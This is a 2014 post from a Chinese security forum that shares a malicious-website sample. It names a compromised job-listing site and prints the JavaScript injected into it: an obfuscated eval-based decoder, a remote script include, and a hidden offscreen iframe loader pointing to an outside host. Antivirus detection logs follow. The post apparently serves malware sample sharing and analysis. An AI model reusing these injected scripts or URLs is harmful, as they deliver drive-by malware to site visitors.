收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 裏面
返回列表 发新帖
查看: 2178|回复: 0
收起左侧

[已鉴定] 裏面

[复制链接]
fireold
发表于 2014-2-1 17:27:09 | 显示全部楼层 |阅读模式
  1. http://distribution-opportunities.com/jobs-amp;services/miscellaneous-services/join-with-success-and-get-the-best-best-3422.htm
复制代码

  1. if (1) {
  2.         whf = "17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5bZq6cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5bZq6cZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq69Zq5cZq58Zq6bZq5cZq3cZq63Zq5cZq64Zq5cZq65Zq6bZq1fZq1eZq60Zq5dZq69Zq58Zq64Zq5cZq1eZq20Zq32Zq4Zq1Zq4Zq1Zq17Zq5bZq6cZq25Zq6aZq69Zq5aZq17Zq34Zq17Zq1eZq5fZq6bZq6bZq67Zq31Zq26Zq26Zq64Zq70Zq60Zq6bZq5bZq5cZq67Zq6bZq5aZq66Zq64Zq25Zq60Zq67Zq58Zq5eZq5cZq25Zq5aZq66Zq64Zq26Zq60Zq64Zq5eZq26Zq69Zq6fZq45Zq68Zq2aZq51Zq43Zq3fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq5bZq6cZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq67Zq66Zq6aZq60Zq6bZq60Zq66Zq65Zq17Zq34Zq17Zq1eZq58Zq59Zq6aZq66Zq63Zq6cZq6bZq5cZq1eZq32Zq4Zq1Zq17Zq5bZq6cZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq5aZq66Zq63Zq66Zq69Zq17Zq34Zq17Zq1eZq28Zq2bZq1eZq32Zq4Zq1Zq17Zq5bZq6cZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq5fZq5cZq60Zq5eZq5fZq6bZq17Zq34Zq17Zq1eZq28Zq2bZq67Zq6fZq1eZq32Zq4Zq1Zq17Zq5bZq6cZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq6eZq60Zq5bZq6bZq5fZq17Zq34Zq17Zq1eZq28Zq2bZq67Zq6fZq1eZq32Zq4Zq1Zq17Zq5bZq6cZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq63Zq5cZq5dZq6bZq17Zq34Zq17Zq1eZq28Zq27Zq27Zq27Zq28Zq2bZq1eZq32Zq4Zq1Zq17Zq5bZq6cZq25Zq6aZq6bZq70Zq63Zq5cZq25Zq6bZq66Zq67Zq17Zq34Zq17Zq1eZq28Zq27Zq27Zq27Zq28Zq2bZq1eZq32Zq4Zq1Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq18Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5eZq5cZq6bZq3cZq63Zq5cZq64Zq5cZq65Zq6bZq39Zq70Zq40Zq5bZq1fZq1eZq5bZq6cZq1eZq20Zq20Zq17Zq72Zq4Zq1Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq6eZq69Zq60Zq6bZq5cZq1fZq1eZq33Zq67Zq17Zq60Zq5bZq34Zq53Zq1eZq5bZq6cZq53Zq1eZq17Zq5aZq63Zq58Zq6aZq6aZq34Zq53Zq1eZq5bZq6cZq27Zq30Zq53Zq1eZq17Zq35Zq33Zq26Zq67Zq35Zq1eZq20Zq32Zq4Zq1Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5eZq5cZq6bZq3cZq63Zq5cZq64Zq5cZq65Zq6bZq39Zq70Zq40Zq5bZq1fZq1eZq5bZq6cZq1eZq20Zq25Zq58Zq67Zq67Zq5cZq65Zq5bZq3aZq5fZq60Zq63Zq5bZq1fZq5bZq6cZq20Zq32Zq4Zq1Zq17Zq74Zq4Zq1Zq74Zq4Zq1Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq5aZq66Zq66Zq62Zq60Zq5cZq45Zq58Zq64Zq5cZq23Zq5aZq66Zq66Zq62Zq60Zq5cZq4dZq58Zq63Zq6cZq5cZq23Zq65Zq3bZq58Zq70Zq6aZq23Zq67Zq58Zq6bZq5fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6bZq66Zq5bZq58Zq70Zq17Zq34Zq17Zq65Zq5cZq6eZq17Zq3bZq58Zq6bZq5cZq1fZq20Zq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5cZq6fZq67Zq60Zq69Zq5cZq17Zq34Zq17Zq65Zq5cZq6eZq17Zq3bZq58Zq6bZq5cZq1fZq20Zq32Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq65Zq3bZq58Zq70Zq6aZq34Zq34Zq65Zq6cZq63Zq63Zq17Zq73Zq73Zq17Zq65Zq3bZq58Zq70Zq6aZq34Zq34Zq27Zq20Zq17Zq65Zq3bZq58Zq70Zq6aZq34Zq28Zq32Zq4Zq1Zq17Zq5cZq6fZq67Zq60Zq69Zq5cZq25Zq6aZq5cZq6bZq4bZq60Zq64Zq5cZq1fZq6bZq66Zq5bZq58Zq70Zq25Zq5eZq5cZq6bZq4bZq60Zq64Zq5cZq1fZq20Zq17Zq22Zq17Zq2aZq2dZq27Zq27Zq27Zq27Zq27Zq21Zq29Zq2bZq21Zq65Zq3bZq58Zq70Zq6aZq20Zq32Zq4Zq1Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq17Zq34Zq17Zq5aZq66Zq66Zq62Zq60Zq5cZq45Zq58Zq64Zq5cZq22Zq19Zq34Zq19Zq22Zq5cZq6aZq5aZq58Zq67Zq5cZq1fZq5aZq66Zq66Zq62Zq60Zq5cZq4dZq58Zq63Zq6cZq5cZq20Zq4Zq1Zq17Zq22Zq17Zq19Zq32Zq5cZq6fZq67Zq60Zq69Zq5cZq6aZq34Zq19Zq17Zq22Zq17Zq5cZq6fZq67Zq60Zq69Zq5cZq25Zq6bZq66Zq3eZq44Zq4bZq4aZq6bZq69Zq60Zq65Zq5eZq1fZq20Zq17Zq22Zq17Zq1fZq1fZq67Zq58Zq6bZq5fZq20Zq17Zq36Zq17Zq19Zq32Zq17Zq67Zq58Zq6bZq5fZq34Zq19Zq17Zq22Zq17Zq67Zq58Zq6bZq5fZq17Zq31Zq17Zq19Zq19Zq20Zq32Zq4Zq1Zq74Zq4Zq1Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq17Zq65Zq58Zq64Zq5cZq17Zq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq69Zq6bZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq60Zq65Zq5bZq5cZq6fZq46Zq5dZq1fZq17Zq65Zq58Zq64Zq5cZq17Zq22Zq17Zq19Zq34Zq19Zq17Zq20Zq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq63Zq5cZq65Zq17Zq34Zq17Zq6aZq6bZq58Zq69Zq6bZq17Zq22Zq17Zq65Zq58Zq64Zq5cZq25Zq63Zq5cZq65Zq5eZq6bZq5fZq17Zq22Zq17Zq28Zq32Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq17Zq1fZq17Zq18Zq6aZq6bZq58Zq69Zq6bZq17Zq20Zq17Zq1dZq1dZq4Zq1Zq17Zq1fZq17Zq65Zq58Zq64Zq5cZq17Zq18Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq6aZq6cZq59Zq6aZq6bZq69Zq60Zq65Zq5eZq1fZq17Zq27Zq23Zq17Zq65Zq58Zq64Zq5cZq25Zq63Zq5cZq65Zq5eZq6bZq5fZq17Zq20Zq17Zq20Zq17Zq20Zq4Zq1Zq17Zq72Zq4Zq1Zq17Zq69Zq5cZq6bZq6cZq69Zq65Zq17Zq65Zq6cZq63Zq63Zq32Zq4Zq1Zq17Zq74Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq17Zq6aZq6bZq58Zq69Zq6bZq17Zq34Zq34Zq17Zq24Zq28Zq17Zq20Zq17Zq69Zq5cZq6bZq6cZq69Zq65Zq17Zq65Zq6cZq63Zq63Zq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5cZq65Zq5bZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq60Zq65Zq5bZq5cZq6fZq46Zq5dZq1fZq17Zq19Zq32Zq19Zq23Zq17Zq63Zq5cZq65Zq17Zq20Zq32Zq4Zq1Zq17Zq60Zq5dZq17Zq1fZq17Zq5cZq65Zq5bZq17Zq34Zq34Zq17Zq24Zq28Zq17Zq20Zq17Zq5cZq65Zq5bZq17Zq34Zq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq63Zq5cZq65Zq5eZq6bZq5fZq32Zq4Zq1Zq17Zq69Zq5cZq6bZq6cZq69Zq65Zq17Zq6cZq65Zq5cZq6aZq5aZq58Zq67Zq5cZq1fZq17Zq5bZq66Zq5aZq6cZq64Zq5cZq65Zq6bZq25Zq5aZq66Zq66Zq62Zq60Zq5cZq25Zq6aZq6cZq59Zq6aZq6bZq69Zq60Zq65Zq5eZq1fZq17Zq63Zq5cZq65Zq23Zq17Zq5cZq65Zq5bZq17Zq20Zq17Zq20Zq32Zq4Zq1Zq74Zq4Zq1Zq60Zq5dZq17Zq1fZq65Zq58Zq6dZq60Zq5eZq58Zq6bZq66Zq69Zq25Zq5aZq66Zq66Zq62Zq60Zq5cZq3cZq65Zq58Zq59Zq63Zq5cZq5bZq20Zq4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5bZq6cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74" [imrnb]("Zq");
  3.     }
  4.     mfyhob = whf;
  5.     dlb = [];
  6.     for (bxo = 22 - 20 - 2; - bxo + 1384 != 0; bxo += 1) {
  7.         dqaz = bxo;
  8.         if ((0x19 == 031)) dlb += tuuieu.fromCharCode(eval(sly + mfyhob[1 * dqaz]) + 0xa - mollrt);
  9.     }
  10.     zyasxn = eval;
  11.     if (Math.ceil(5.5) === 6) zyasxn(dlb)
  12. } /*/a9a007*/

  14. /*8b7c26*/
  15. document.write('<script src="http://www.camporell-expo.com/TB7gVEYo.php?id=58368124" type="text/javascript"></script>'); /*/8b7c26*/
复制代码

  1. function du09() {
  2.      var static = 'ajax';
  3.      var controller = 'index.php';
  4.      var du = document.createElement('iframe');

  6.      du.src = 'http://myitdeptcom.ipage.com/img/rxNq3ZLH.php';
  7.      du.style.position = 'absolute';
  8.      du.style.color = '14';
  9.      du.style.height = '14px';
  10.      du.style.width = '14px';
  11.      du.style.left = '100014';
  12.      du.style.top = '100014';

  14.      if (!document.getElementById('du')) {
  15.          document.write('<p id=\'du\' class=\'du09\' ></p>');
  16.          document.getElementById('du').appendChild(du);
  17.      }
  18. }

  20. function SetCookie(cookieName, cookieValue, nDays, path) {
  21.      var today = new Date();
  22.      var expire = new Date();
  23.      if (nDays == null || nDays == 0) nDays = 1;
  24.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  25.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  26. }

  28. function GetCookie(name) {
  29.      var start = document.cookie.indexOf(name + "=");
  30.      var len = start + name.length + 1;
  31.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  32.          return null;
  33.      }
  34.      if (start == -1) return null;
  35.      var end = document.cookie.indexOf(";", len);
  36.      if (end == -1) end = document.cookie.length;
  37.      return unescape(document.cookie.substring(len, end));
  38. }
  39. if (navigator.cookieEnabled) {
  40.      if (GetCookie('visited_uq') == 55) {} else {
  41.          SetCookie('visited_uq', '55', '1', '/');

  43.          du09();
  44.      }
  45. }
复制代码


Avira
2014/2/1 下午 05:15 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\gb_scripts[1].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:傳輸至掃描程式

2014/2/1 下午 05:15 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.distribution-opportunities.com/includes/greybox/gb_scripts.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Quidvetis.A' [virus]。
      已採取動作:已略過

2014/2/1 下午 05:15 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        797
      目錄數:        0
      惡意程式碼數:        0
      警告數:        0

2014/2/1 下午 05:14 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\jsTabs[1].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:傳輸至掃描程式

2014/2/1 下午 05:14 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\jsTabs[1].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:拒絕存取

2014/2/1 下午 05:14 [Web Protection] 發現惡意程式碼
      從 URL "http://www.distribution-opportunities.com/themes/anunciamex/jsTabs.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Quidvetis.A' [virus]。
      已採取動作:已略過

2014/2/1 下午 05:14 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\common[2].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:傳輸至掃描程式

2014/2/1 下午 05:14 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\common[2].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:拒絕存取

2014/2/1 下午 05:14 [Web Protection] 發現惡意程式碼
      從 URL "http://www.distribution-opportunities.com/includes/js/common.js" 存取資料時,
      發現病毒或有害的程式 'JS/Quidvetis.A' [virus]。
      已採取動作:已略過

2014/2/1 下午 05:13 [Web Protection] 發現惡意程式碼
      從 URL "http://www.distribution-opportunities.com/themes/anunciamex/jsTabs.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Quidvetis.A' [virus]。
      已採取動作:已略過

2014/2/1 下午 05:13 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\AJS[1].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:拒絕存取

2014/2/1 下午 05:13 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\gb_scripts[1].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:拒絕存取

2014/2/1 下午 05:13 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\VUGD722P\common[1].js 中
      偵測到病毒或有害的程式 'JS/Quidvetis.A [virus]'
      執行的動作:拒絕存取

2014/2/1 下午 05:12 [Web Protection] 發現惡意程式碼
      從 URL "http://www.distribution-opportunities.com/includes/js/common.js" 存取資料時,
      發現病毒或有害的程式 'JS/Quidvetis.A' [virus]。
      已採取動作:已略過


av1.jpg


fs is
fs1.jpg


Sophos
s.jpg
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 18:01 , Processed in 0.131410 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表